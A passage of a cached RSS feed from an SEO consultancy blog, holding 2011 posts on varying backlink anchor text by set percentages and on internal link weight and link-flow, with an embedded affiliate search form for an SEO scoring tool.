profile.</p>\n<ul>\n<li>Use the domain name or website address  in 10% of inbound links (ideally to the homepage)</li>\n<li>Use the <a href=\"http://www.seodesignsolutions.com/blog/how-to-reference-material/how-to-seo-your-website/\">primary shingle</a> “exact match” keyword to a preferred silo landing page (a page built specifically for that keyword” approximately 35% of the time while keeping link velocity in mind (not building or losing links too fast) while linking to it from the homepage or other strong navigational or silo landing pages from “<a href=\"http://www.seodesignsolutions.com/blog/seo-consulting/which-links-pass-the-most-weight-in-search-engines/\">contextual links</a>”.</li>\n<li>Use an alternative variations 15% of the time (to mix up the natural inbound link diversity) such as juxtaposed shingles, or synonyms mixed with the primary keyword.</li>\n<li>Use long tail variations 20% of the time (whereby the keyword is surrounded by the primary keyword and / or additional modifiers either before or after the shingles.</li>\n<li>Use the plural variation 20% of the time (building both singular and plural variations ensures you rank for both).</li>\n</ul>\n<p>Also remember, the same applies for internal links, except for the diversity should be less, but still incorporate a variety of shingles, depending on the method you are utilizing. For example, in order to boost one keyword, then:</p>\n<ul>\n<li>Build the same anchor text shingle (group of words) to the primary landing page from within the site.</li>\n</ul>\n<p>To make the page rank for <a href=\"http://www.seodesignsolutions.com/blog/seo-tips/seo-rankings-and-how-to-create-them/\">additional keyword variations</a> / keyword queries (that either appear on the page or are linked form pages designed to rank for those shingles) which are in essence “<strong>passing along</strong>” their link-flow and authority to the target page. For that method of on page / off page SEO ratios use:</p>\n<ul>\n<li>Use a mixed ratio of primary internal links to the target / preferred landing page</li>\n<li> Use a mixed ratio of off page inbound links to make the page rank for the spread of aggregate links in the anchor text.</li>\n</ul>\n<p>The extent of the result depends on (a) competitors (b) domain and page strength (c) trust passed from the citation of the collective links and (d) the percentage of on page and off page inbound links to a page.</p>\n<p>The takeaway here is diversity is the spice of life, and also applies when building internal or inbound back links. So, mix it up (your anchor text) to get past stale rankings and strengthen the link profile of your websites. Ultimately the ratios are up to you, but at least you have a method to fall back for a skeleton when it comes to shingle usage and links (either internal or inbound).</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=a1yVfIhjp24:Y0N922qjWXM:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/a1yVfIhjp24\" height=\"1\" width=\"1\"/>\";}s:11:\"description\";s:347:\"Aside from enjoying using the word “obfuscate” in a sentence, the meaning is clear for SEO when considering link building. Obfuscating links for the purpose of optimization simply means adding variety and switching things up (with your links) to avoid a pattern. In this context, the pattern is anchor text obviousness (linking to a page [...]\";s:5:\"slash\";a:1:{s:8:\"comments\";s:1:\"6\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:89:\"http://www.seodesignsolutions.com/blog/link-building/should-you-obfuscate-your-backlinks/\";}s:7:\"summary\";s:347:\"Aside from enjoying using the word “obfuscate” in a sentence, the meaning is clear for SEO when considering link building. Obfuscating links for the purpose of optimization simply means adding variety and switching things up (with your links) to avoid a pattern. In this context, the pattern is anchor text obviousness (linking to a page [...]\";s:12:\"atom_content\";s:6022:\"<p>Aside from enjoying using the word “<a href=\"http://en.wikipedia.org/wiki/Obfuscation\">obfuscate</a>” in a sentence, the meaning is clear for SEO when considering link building. Obfuscating links for the purpose of optimization simply means adding variety and switching things up (with your links) to avoid a pattern.</p>\n<div id=\"attachment_9020\" class=\"wp-caption aligncenter\" style=\"width: 410px\"><a href=\"http://www.seodesignsolutions.com/blog/link-building/should-you-obfuscate-your-backlinks/\"><img class=\"size-full wp-image-9020\" title=\"obfuscating-links\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2011/11/obfuscating-links.jpg\" alt=\"\" width=\"400\" height=\"300\" /></a><p class=\"wp-caption-text\">Should You Obfuscate Your Links?</p></div>\n<p>In this context, the pattern is anchor text obviousness (linking to a page with the same anchor text with minimal variation). Failure to add variety to inbound or internal anchor text (links) can lead to <a href=\"http://www.seodesignsolutions.com/blog/seo/how-to-avoid-seo-over-optimization/\">over optimization</a> as a result of link velocity and how people link from the web.<span id=\"more-9019\"></span></p>\n<p>For example, if a large percentage of your backlinks are all from similar IP sources, have appeared in clusters in a timeline that seems (to good to be true), then chances are they could leave a trail that suggests that some type of <em>intentional promotion</em> / link building being done.</p>\n<p>While it is no surprise (as a capitalistic system denotes) competition can bring out the best and the worst of us. While the moral climate of promotion is questionable, it all boils down to intent. The quandary about link building (between Google and SEO) is based on the intent of the link.</p>\n<p>Their argument is, are you linking to other websites because you want to share a resource or because someone is paying you to do so? While their position on links is clear, expecting the web to conform is highly unlikely (considering what is at stake) high rankings and traffic for positions above the fold for businesses who bag the best links with ideal anchor text.</p>\n<p>Considering that links were around before search engines and links are the only thing allowing you to move from page to page and website to website about the web only validates their importance. Your interpretation of link building should be (links come in various types but if used in the right context, each type has a place) if you are using a tiered approach (to deep to discuss in this brief post).</p>\n<h3>Implementing Shingle Diversity</h3>\n<p>While there are no absolutes, merely consider these suggestions ideal guidelines for building a more robust and / or natural link profile.</p>\n<ul>\n<li>Use the domain name or website address  in 10% of inbound links (ideally to the homepage)</li>\n<li>Use the <a href=\"http://www.seodesignsolutions.com/blog/how-to-reference-material/how-to-seo-your-website/\">primary shingle</a> “exact match” keyword to a preferred silo landing page (a page built specifically for that keyword” approximately 35% of the time while keeping link velocity in mind (not building or losing links too fast) while linking to it from the homepage or other strong navigational or silo landing pages from “<a href=\"http://www.seodesignsolutions.com/blog/seo-consulting/which-links-pass-the-most-weight-in-search-engines/\">contextual links</a>”.</li>\n<li>Use an alternative variations 15% of the time (to mix up the natural inbound link diversity) such as juxtaposed shingles, or synonyms mixed with the primary keyword.</li>\n<li>Use long tail variations 20% of the time (whereby the keyword is surrounded by the primary keyword and / or additional modifiers either before or after the shingles.</li>\n<li>Use the plural variation 20% of the time (building both singular and plural variations ensures you rank for both).</li>\n</ul>\n<p>Also remember, the same applies for internal links, except for the diversity should be less, but still incorporate a variety of shingles, depending on the method you are utilizing. For example, in order to boost one keyword, then:</p>\n<ul>\n<li>Build the same anchor text shingle (group of words) to the primary landing page from within the site.</li>\n</ul>\n<p>To make the page rank for <a href=\"http://www.seodesignsolutions.com/blog/seo-tips/seo-rankings-and-how-to-create-them/\">additional keyword variations</a> / keyword queries (that either appear on the page or are linked form pages designed to rank for those shingles) which are in essence “<strong>passing along</strong>” their link-flow and authority to the target page. For that method of on page / off page SEO ratios use:</p>\n<ul>\n<li>Use a mixed ratio of primary internal links to the target / preferred landing page</li>\n<li> Use a mixed ratio of off page inbound links to make the page rank for the spread of aggregate links in the anchor text.</li>\n</ul>\n<p>The extent of the result depends on (a) competitors (b) domain and page strength (c) trust passed from the citation of the collective links and (d) the percentage of on page and off page inbound links to a page.</p>\n<p>The takeaway here is diversity is the spice of life, and also applies when building internal or inbound back links. So, mix it up (your anchor text) to get past stale rankings and strengthen the link profile of your websites. Ultimately the ratios are up to you, but at least you have a method to fall back for a skeleton when it comes to shingle usage and links (either internal or inbound).</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=a1yVfIhjp24:Y0N922qjWXM:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/a1yVfIhjp24\" height=\"1\" width=\"1\"/>\";}i:26;a:12:{s:5:\"title\";s:51:\"Which Links Pass the Most Weight in Search Engines?\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/sUdzMIoZu7s/\";s:8:\"category\";s:74:\"SEO ConsultingAdvanced On Page SEOlink flowLink WeightOn Page Optimization\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Fri, 04 Nov 2011 01:43:08 PDT\";s:4:\"guid\";s:46:\"http://www.seodesignsolutions.com/blog/?p=9012\";s:7:\"content\";a:1:{s:7:\"encoded\";s:12435:\"<p>Link weight and <a href=\"http://www.seodesignsolutions.com/blog/seo-resources/why-internal-links-are-more-important-than-backlinks/\">link-flow</a> are the most critical on page elements after you (1) map out which keywords you’re targeting (2) mirror the relevance hierarchy through the site architecture through the respective pillars (landing pages) and supporting articles and (3) initiate the <a href=\"http://www.seodesignsolutions.com/blog/seo/maximizing-market-share-with-seo-modifiers/\">citation process</a> via internal linking and off page inbound links.</p>\n<div id=\"attachment_9014\" class=\"wp-caption aligncenter\" style=\"width: 450px\"><a href=\"http://www.seodesignsolutions.com/blog/seo-consulting/which-links-pass-the-most-weight-in-search-engines/\"><img class=\"size-full wp-image-9014\" title=\"link-weight\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2011/11/link-weight.jpg\" alt=\"On Page Link-Flow and Link Weight\" width=\"440\" height=\"300\" /></a><p class=\"wp-caption-text\">Which Links Pass the Most Link-Flow and Link Weight?</p></div>\n<p>However, before you initiate any type of off page SEO (building inbound links); make sure that you aren’t building your internal links by relying on minimal navigational links alone.</p>\n<p>If you fail to map out your on page elements, it’s the equivalent of trying to fill a <a href=\"http://www.seodesignsolutions.com/blog/seo/dealing-with-link-loss/\">leaky bucket</a> full of water to no avail. No matter how much water you pour into it, the bigger the puddle on the floor. In essence, the container becomes null (regardless of the volume being poured into it).<span id=\"more-9012\"></span></p>\n<p>This is often the case with most SEO practitioners who fall into the vicious cycle of relying heavily on <a href=\"http://www.seodesignsolutions.com/blog/search-engine-optimization-myths/on-page-off-page-seo/\">off page ranking factor</a> (links) to perform the heavy lifting and overlook the on page SEO finesse required to create the proper balance.</p>\n<p>Like the analogy above, within your website, the premise of link-weight and link-flow similar to the bucket.</p>\n<p>The second layer to this quandary is <strong>the volume of outbound links on a page</strong> (even if they are to other internal pages) should be balanced by a fair text to link ratio in addition to inbound links from other internal and external pages.</p>\n<p>For example, a page with 10 outbound links is 10 times stronger than a page with 100 outbound / internal links. Which would you rather have boosting your internal pages? More on that later&#8230;</p>\n<p>During the interim, feel free to peruse related posts on the topic below:</p>\n<ul>\n<li><a href=\"http://www.seodesignsolutions.com/blog/link-building/seo-link-building-understanding-volume-velocity-and-diversity/\">Understanding Link Volume Velocity and Diversity</a></li>\n<li><a href=\"http://www.seodesignsolutions.com/blog/link-building/balancing-link-diversity-link-velocity-and-link-volume/\">Balancing Link Velocity and Link Volume</a></li>\n<li><a href=\"http://www.seodesignsolutions.com/blog/seo-videos/google-website-analysis-live-site-review/\">Google Website Analysis &#8211; Live Site Review</a></li>\n</ul>\n<h3>Does a link count on the page more than once?</h3>\n<p>Yes, a link does count on the page more than once and there is a distinct difference between the amount of link-flow from a link in the navigation, footer or sidebar, an image based “<a href=\"http://www.seodesignsolutions.com/blog/seo/using-server-side-includes-and-alt-attributes-for-seo/\">alt attribute link</a>&#8221; and a <a href=\"http://www.seodesignsolutions.com/blog/link-building/link-building-seo-guide/\">contextual link</a> “a text link linked amidst supporting semantically related keywords”.</p>\n<p>Fortunately for advanced SEO’s who map link flow and shingles as part of the on page SEO process, there are tools like SEOEngine that (1) crawl, analyze and provide invaluable feedback on the link-flow percentages of each page in your website (2) whether or not the shingles (groups of words) are aligned with the market focus (the purpose of the page) as well as (3) how many inbound and / or external links are present or (4) whether or not the market focus is supported by sufficient link-flow – in addition to dozens of other critical metrics; and then translates it into a 1 out of 100 scoring system.<br />\n      <!--<br />\n      *******************************<br />\n      * START SEO Engine(TM) SEARCH FORM<br />\n      *<br />\n      * Subject to SEO Engine(TM) Terms of Service (TOS) found at \'http://www.seoengine.com/terms.htm\'.<br />\n      * Do not modify or alter this Search Bar in any way.  Must be displayed as shown at:<br />\n      *<br />\n      * \'http://www.seoengine.com/free-seo-search-bar-tool.htm\'<br />\n      *<br />\n      * Copyright © 2001-2011 SEOEngine.com. All rights reserved. Patent Pending.<br />\n      --><br />\n      <script type=\"text/javascript\">\n        function clickSearchBar(searchBar) {</p>\n<p>        if (searchBar.value == \'Enter Website or URL\') {\n        searchBar.style.color = \'black\';\n        searchBar.value = \'http://\';\n        var range = searchBar.createTextRange();\n        range.move(\'character\', 7);\n        range.select();\n        }</p>\n<p>        }\n      </script>  </p>\n<form method=\"post\" action=\"http://search.seoengine.com/\" enctype=\"application/x-www-form-urlencoded\">\n        <input type=\"hidden\" name=\"externalSearchForm\" value=\"\" /><input type=\"hidden\" name=\"affiliateId\" value=\"320\" />\n<div style=\"font-size: 22px; text-align: center;\">\n<div style=\"font-weight: bold;\">Optimize Your Website NOW!</div>\n<div style=\"margin: 10px 0px 0px 0px;\">\n            <a href=\"http://www.seoengine.com/\"><img style=\"border-style: none; top: 5px; position: relative;\" alt=\"SEO Software\" src=\"http://www.seoengine.com/images/seoeng-powered-by.png\"/></a><br />\n            <input style=\"color: #999990; font-size: 18px; width: 350px; border: 2px solid #999990;\" onkeydown=\"clickSearchBar(this);\" onclick=\"clickSearchBar(this);\" type=\"text\" name=\"website\" value=\"Enter Website or URL\"/><br />\n            <input class=\"button\" style=\"font-size: 18px; font-weight: bold;\" type=\"submit\" value=\"GO!\"/>\n          </div>\n</p></div>\n<p>        <input type=\"text\" style=\"visibility:hidden;display:none;width:99%;text-align:center;\" name=\"do-not-remove\" value=\"Do NOT remove this -- allows users to hit \'enter\' on IE -- this box will not be shown!!\"/><br />\n      </form>\n<p>      <!-- END SEO Engine SEARCH FORM --></p>\n<p>    If you&#8217;re curious about your on page SEO score (on a scale of 1-100), enter your domain name in the SEOEngine toolbar above for a behind the scenes look from the eyes of a search engine.</p>\n<h3>What About First Link Priority?</h3>\n<p>The notion behind this theory was that the first crawled link was the only one that mattered if you had more than one link to a target landing page (with the same or multiple anchors). My response&#8230;</p>\n<p>Yes, there is a scoring system that search engines utilize to sort, sift and assign weight in the <a href=\"http://www.seoengine.com/link-flow.htm?affiliateId=320\">eigenvector</a>, despite the first link priority suggestion made popular years ago from <a href=\"http://www.leslierohde.com/\">Leslie Rohde</a> (whom I have the utmost respect for). Despite the theory, <strong>yes, more than one link on the page passes weight and ranking factor</strong>, even if those links are to <strong>the same destination page</strong> and have <strong>the same anchor text</strong>.</p>\n<p>Aside from search engine metrics always changing, I can assure you that search engines weight different areas of the page with different integer values (such as the body area and contextual links carrying more weight than footer or links in the sidebar).</p>\n<p>Not to say that each type of link does not have its place for conversion cues and visual appeal, some more so than others, but you should understand what type of inbound anchor text link flow is required to rank for more competitive keywords.</p>\n<p>One algorithm that pays particular attention to page layout dubbed <a rel=\"nofollow\" href=\"http://research.microsoft.com/apps/pubs/default.aspx?id=70027\">VIPS</a> which is a <a href=\"http://research.microsoft.com/pubs/70027/tr-2003-79.pdf\">Vision-Based Page Segmentation Algorithm</a> dating back to 2003. This algorithm uses a top down approach and can intelligently decipher relevance based on visual blocks and degrees of coherence.</p>\n<p>Let’s just say, things have evolved since then, but layout, positioning, proximity and where content and or links matters based on position on the page to a search engine. The <a href=\"http://www.seoengine.com/?affiliateId=320\">SEOEngine</a> does an excellent job of this as well when scoring link-flow within a website based on<em> link type, location, and multivariate shingle analysis</em> in addition to <em>anchor text</em>.</p>\n<h3>Link Value Trumps Link Volume</h3>\n<p>Sometimes it’s not about the volume of links as much as it is about the efficiency of the website and its propensity to leverage on page link flow properly. Combine this with website silo architecture and a powerful collection of strong, topical backlinks to your silo landing pages and you have a trifecta that makes Wikipedia, Amazon and Fortune 500 companies a ripple in your wake as you devour the top 10 positions on your way to the top.</p>\n<p>We do with a few hundred links what most do with thousands. Rankings are driven from understanding (a) the proper amount of shingles, internal links and deep links, backed by (b) the amount of trust and authority developed as a byproduct, percolation and time to achieve the authority set in Google (the page in which all other less perfect pages deemed by the algorithm) are measured.</p>\n<p>By chipping away with semantically aligned topical nodes of content, supporting synonyms and blanketing the relevance landscape, your websites base expands and the process of <a href=\"http://www.seodesignsolutions.com/blog/seo-tips/10-seo-tips-to-triple-keyword-visibility/\">keyword stemming</a> is no longer a theory, but a byproduct of tactful content development aligned with on page and off page citation (via internal links)and syndication (validation from citation from off page sources).</p>\n<p>To keep the post from spilling over into a 4000 word whitepaper, we can continue the conversation at a later date. I plan to create a video to follow up and showcase how (with the proper understanding) you can map and / or correct link-flow imbalance within a website particularly when <a href=\"http://www.seodesignsolutions.com/blog/seo-videos/dws-2-5-update-tools-seo-campaign-management/\">mapping out shingles</a> for on page content and internal links, in addition to deep links to create a ranking juggernaut.</p>\n<p>In the meantime, if you want to schedule an SEO consultation for your website to map out link-flow, <a href=\"http://www.seodesignsolutions.com/seo/\">visit this page</a> or <a href=\"mailto:support@seodesignsolutions.com\">email us</a> to get started (hourly rate billed at $400/hr).</p>\n<p>Link-flow is the lifeblood of your website. Once mastered, you will think before you link and understand how each page, each word and <strong>each type of link within a website</strong> works cohesively to achieve a common goal.</p>\n<p>In the meantime, we hope you enjoyed our SEO tips and tactics to distinguish your website in search engines from the <a href=\"http://www.seodesignsolutions.com/blog/\">SEO Design Solutions Blog</a>.</p>\n<p>Make sure you follow us on <a href=\"https://twitter.com/#!/Jeffrey_Smith\">twitter</a>, like us on <a href=\"http://www.facebook.com/pages/SEO-Design-Solutions/118391624368\">Facebook</a> or subscribe to our <a href=\"http://feeds.seodesignsolutions.com/SeoDesignSolutionsBlog\">RSS feed</a> for additional search engine optimization tips and techniques.</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=sUdzMIoZu7s:x8qmW3lKvo0:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/sUdzMIoZu7s\" height=\"1\" width=\"1\"/>\";}s:11:\"description\";s:369:\"Link weight and link-flow are the most critical on page elements after you (1) map out which keywords you’re targeting (2) mirror the relevance hierarchy through the site architecture through the respective pillars (landing pages) and supporting articles and (3) initiate the citation process via internal linking and off page inbound links. However, before you [...]\";s:5:\"slash\";a:1:{s:8:\"comments\";s:2:\"10\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:105:\"http://www.seodesignsolutions.com/blog/seo-consulting/which-links-pass-the-most-weight-in-search-engines/\";}s:7:\"summary\";s:369:\"Link weight and link-flow are the most critical on page elements after you (1) map out which keywords you’re targeting (2) mirror the relevance hierarchy through the site architecture through the respective pillars (landing pages) and supporting articles and (3) initiate the citation process via internal linking and off page inbound links. However, before you [...]\";s:12:\"atom_content\";s:12435:\"<p>Link weight and <a href=\"http://www.seodesignsolutions.com/blog/seo-resources/why-internal-links-are-more-important-than-backlinks/\">link-flow</a> are the most critical on page elements after you (1) map out which keywords you’re targeting (2) mirror the relevance hierarchy through the site architecture through the respective pillars (landing pages) and supporting articles and (3) initiate the <a href=\"http://www.seodesignsolutions.com/blog/seo/maximizing-market-share-with-seo-modifiers/\">citation process</a> via internal linking and off page inbound links.</p>\n<div id=\"attachment_9014\" class=\"wp-caption aligncenter\" style=\"width: 450px\"><a href=\"http://www.seodesignsolutions.com/blog/seo-consulting/which-links-pass-the-most-weight-in-search-engines/\"><img class=\"size-full wp-image-9014\" title=\"link-weight\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2011/11/link-weight.jpg\" alt=\"On Page Link-Flow and Link Weight\" width=\"440\" height=\"300\" /></a><p class=\"wp-caption-text\">Which Links Pass the Most Link-Flow and Link Weight?</p></div>\n<p>However, before you initiate any type of off page SEO (building inbound links); make sure that you aren’t building your internal links by relying on minimal navigational links alone.</p>\n<p>If you fail to map out your on page elements, it’s the equivalent of trying to fill a <a href=\"http://www.seodesignsolutions.com/blog/seo/dealing-with-link-loss/\">leaky bucket</a> full of water to no avail. No matter how much water you pour into it, the bigger the puddle on the floor. In essence, the container becomes null (regardless of the volume being poured into it).<span id=\"more-9012\"></span></p>\n<p>This is often the case with most SEO practitioners who fall into the vicious cycle of relying heavily on <a href=\"http://www.seodesignsolutions.com/blog/search-engine-optimization-myths/on-page-off-page-seo/\">off page ranking factor</a> (links) to perform the heavy lifting and overlook the on page SEO finesse required to create the proper balance.</p>\n<p>Like the analogy above, within your website, the premise of link-weight and link-flow similar to the bucket.</p>\n<p>The second layer to this quandary is <strong>the volume of outbound links on a page</strong> (even if they are to other internal pages) should be balanced by a fair text to link ratio in addition to inbound links from other internal and external pages.</p>\n<p>For example, a page with 10 outbound links is 10 times stronger than a page with 100 outbound / internal links. Which would you rather have boosting your internal pages? More on that later&#8230;</p>\n<p>During the interim, feel free to peruse related posts on the topic below:</p>\n<ul>\n<li><a href=\"http://www.seodesignsolutions.com/blog/link-building/seo-link-building-understanding-volume-velocity-and-diversity/\">Understanding Link Volume Velocity and Diversity</a></li>\n<li><a href=\"http://www.seodesignsolutions.com/blog/link-building/balancing-link-diversity-link-velocity-and-link-volume/\">Balancing Link Velocity and Link Volume</a></li>\n<li><a href=\"http://www.seodesignsolutions.com/blog/seo-videos/google-website-analysis-live-site-review/\">Google Website Analysis &#8211; Live Site Review</a></li>\n</ul>\n<h3>Does a link count on the page more than once?</h3>\n<p>Yes, a link does count on the page more than once and there is a distinct difference between the amount of link-flow from a link in the navigation, footer or sidebar, an image based “<a href=\"http://www.seodesignsolutions.com/blog/seo/using-server-side-includes-and-alt-attributes-for-seo/\">alt attribute link</a>&#8221; and a <a href=\"http://www.seodesignsolutions.com/blog/link-building/link-building-seo-guide/\">contextual link</a> “a text link linked amidst supporting semantically related keywords”.</p>\n<p>Fortunately for advanced SEO’s who map link flow and shingles as part of the on page SEO process, there are tools like SEOEngine that (1) crawl, analyze and provide invaluable feedback on the link-flow percentages of each page in your website (2) whether or not the shingles (groups of words) are aligned with the market focus (the purpose of the page) as well as (3) how many inbound and / or external links are present or (4) whether or not the market focus is supported by sufficient link-flow – in addition to dozens of other critical metrics; and then translates it into a 1 out of 100 scoring system.<br />\n      <!--<br />\n      *******************************<br />\n      * START SEO Engine(TM) SEARCH FORM<br />\n      *<br />\n      * Subject to SEO Engine(TM) Terms of Service (TOS) found at \'http://www.seoengine.com/terms.htm\'.<br />\n      * Do not modify or alter this Search Bar in any way.  Must be displayed as shown at:<br />\n      *<br />\n      * \'http://www.seoengine.com/free-seo-search-bar-tool.htm\'<br />\n      *<br />\n      * Copyright © 2001-2011 SEOEngine.com. All rights reserved. Patent Pending.<br />\n      --><br />\n      <script type=\"text/javascript\">\n        function clickSearchBar(searchBar) {</p>\n<p>        if (searchBar.value == \'Enter Website or URL\') {\n        searchBar.style.color = \'black\';\n        searchBar.value = \'http://\';\n        var range = searchBar.createTextRange();\n        range.move(\'character\', 7);\n        range.select();\n        }</p>\n<p>        }\n      </script>  </p>\n<form method=\"post\" action=\"http://search.seoengine.com/\" enctype=\"application/x-www-form-urlencoded\">\n        <input type=\"hidden\" name=\"externalSearchForm\" value=\"\" /><input type=\"hidden\" name=\"affiliateId\" value=\"320\" />\n<div style=\"font-size: 22px; text-align: center;\">\n<div style=\"font-weight: bold;\">Optimize Your Website NOW!</div>\n<div style=\"margin: 10px 0px 0px 0px;\">\n            <a href=\"http://www.seoengine.com/\"><img style=\"border-style: none; top: 5px; position: relative;\" alt=\"SEO Software\" src=\"http://www.seoengine.com/images/seoeng-powered-by.png\"/></a><br />\n            <input style=\"color: #999990; font-size: 18px; width: 350px; border: 2px solid #999990;\" onkeydown=\"clickSearchBar(this);\" onclick=\"clickSearchBar(this);\" type=\"text\" name=\"website\" value=\"Enter Website or URL\"/><br />\n            <input class=\"button\" style=\"font-size: 18px; font-weight: bold;\" type=\"submit\" value=\"GO!\"/>\n          </div>\n</p></div>\n<p>        <input type=\"text\" style=\"visibility:hidden;display:none;width:99%;text-align:center;\" name=\"do-not-remove\" value=\"Do NOT remove this -- allows users to hit \'enter\' on IE -- this box will not be shown!!\"/><br />\n      </form>\n<p>      <!-- END SEO Engine SEARCH FORM --></p>\n<p>    If you&#8217;re curious about your on page SEO score (on a scale of 1-100), enter your domain name in the SEOEngine toolbar above for a behind the scenes look from the eyes of a search engine.</p>\n<h3>What About First Link Priority?</h3>\n<p>The notion behind this theory was that the first crawled link was the only one that mattered if you had more than one link to a target landing page (with the same or multiple anchors). My response&#8230;</p>\n<p>Yes, there is a scoring system that search engines utilize to sort, sift and assign weight in the <a href=\"http://www.seoengine.com/link-flow.htm?affiliateId=320\">eigenvector</a>, despite the first link priority suggestion made popular years ago from <a href=\"http://www.leslierohde.com/\">Leslie Rohde</a> (whom I have the utmost respect for). Despite the theory, <strong>yes, more than one link on the page passes weight and ranking factor</strong>, even if those links are to <strong>the same destination page</strong> and have <strong>the same anchor text</strong>.</p>\n<p>Aside from search engine metrics always changing, I can assure you that search engines weight different areas of the page with different integer values (such as the body area and contextual links carrying more weight than footer or links in the sidebar).</p>\n<p>Not to say that each type of link does not have its place for conversion cues and visual appeal, some more so than others, but you should understand what type of inbound anchor text link flow is required to rank for more competitive keywords.</p>\n<p>One algorithm that pays particular attention to page layout dubbed <a rel=\"nofollow\" href=\"http://research.microsoft.com/apps/pubs/default.aspx?id=70027\">VIPS</a> which is a <a href=\"http://research.microsoft.com/pubs/70027/tr-2003-79.pdf\">Vision-Based Page Segmentation Algorithm</a> dating back to 2003. This algorithm uses a top down approach and can intelligently decipher relevance based on visual blocks and degrees of coherence.</p>\n<p>Let’s just say, things have evolved since then, but layout, positioning, proximity and where content and or links matters based on position on the page to a search engine. The <a href=\"http://www.seoengine.com/?affiliateId=320\">SEOEngine</a> does an excellent job of this as well when scoring link-flow within a website based on<em> link type, location, and multivariate shingle analysis</em> in addition to <em>anchor text</em>.</p>\n<h3>Link Value Trumps Link Volume</h3>\n<p>Sometimes it’s not about the volume of links as much as it is about the efficiency of the website and its propensity to leverage on page link flow properly. Combine this with website silo architecture and a powerful collection of strong, topical backlinks to your silo landing pages and you have a trifecta that makes Wikipedia, Amazon and Fortune 500 companies a ripple in your wake as you devour the top 10 positions on your way to the top.</p>\n<p>We do with a few hundred links what most do with thousands. Rankings are driven from understanding (a) the proper amount of shingles, internal links and deep links, backed by (b) the amount of trust and authority developed as a byproduct, percolation and time to achieve the authority set in Google (the page in which all other less perfect pages deemed by the algorithm) are measured.</p>\n<p>By chipping away with semantically aligned topical nodes of content, supporting synonyms and blanketing the relevance landscape, your websites base expands and the process of <a href=\"http://www.seodesignsolutions.com/blog/seo-tips/10-seo-tips-to-triple-keyword-visibility/\">keyword stemming</a> is no longer a theory, but a byproduct of tactful content development aligned with on page and off page citation (via internal links)and syndication (validation from citation from off page sources).</p>\n<p>To keep the post from spilling over into a 4000 word whitepaper, we can continue the conversation at a later date. I plan to create a video to follow up and showcase how (with the proper understanding) you can map and / or correct link-flow imbalance within a website particularly when <a href=\"http://www.seodesignsolutions.com/blog/seo-videos/dws-2-5-update-tools-seo-campaign-management/\">mapping out shingles</a> for on page content and internal links, in addition to deep links to create a ranking juggernaut.</p>\n<p>In the meantime, if you want to schedule an SEO consultation for your website to map out link-flow, <a href=\"http://www.seodesignsolutions.com/seo/\">visit this page</a> or <a href=\"mailto:support@seodesignsolutions.com\">email us</a> to get started (hourly rate billed at $400/hr).</p>\n<p>Link-flow is the lifeblood of your website. Once mastered, you will think before you link and understand how each page, each word and <strong>each type of link within a website</strong> works cohesively to achieve a common goal.</p>\n<p>In the meantime, we hope you enjoyed our SEO tips and tactics to distinguish your website in search engines from the <a href=\"http://www.seodesignsolutions.com/blog/\">SEO Design Solutions Blog</a>.</p>\n<p>Make sure you follow us on <a href=\"https://twitter.com/#!/Jeffrey_Smith\">twitter</a>, like us on <a href=\"http://www.facebook.com/pages/SEO-Design-Solutions/118391624368\">Facebook</a> or subscribe to our <a href=\"http://feeds.seodesignsolutions.com/SeoDesignSolutionsBlog\">RSS feed</a> for additional search engine optimization tips and techniques.</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=sUdzMIoZu7s:x8qmW3lKvo0:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/sUdzMIoZu7s\" height=\"1\" width=\"1\"/>\";}i:27;a:12:{s:5:\"title\";s:23:\"Is SEO a Moving Target?\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/igml2SckFds/\";s:8:\"category\";s:116:\"SEOContent Curation or CreationKeyword TargetingPicking the Best KeywordsSEO TargetingWhich Keywords Should I Target\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Wed, 02 Nov 2011 00:06:45 PDT\";s:4:\"guid\";s:46:\"http://www.seodesignsolutions.com/blog/?p=9004\";s:7:\"content\";a:1:{s:7:\"encoded\";s:8647:\"<p>Is SEO a moving target or are you simply shooting blanks in the dark? It’s no surprise that for those of you trying to get your site ranked that you&#8217;ve discovered that SEO is <strong>“subject to change”</strong> and often on a daily or weekly basis.</p>\n<div 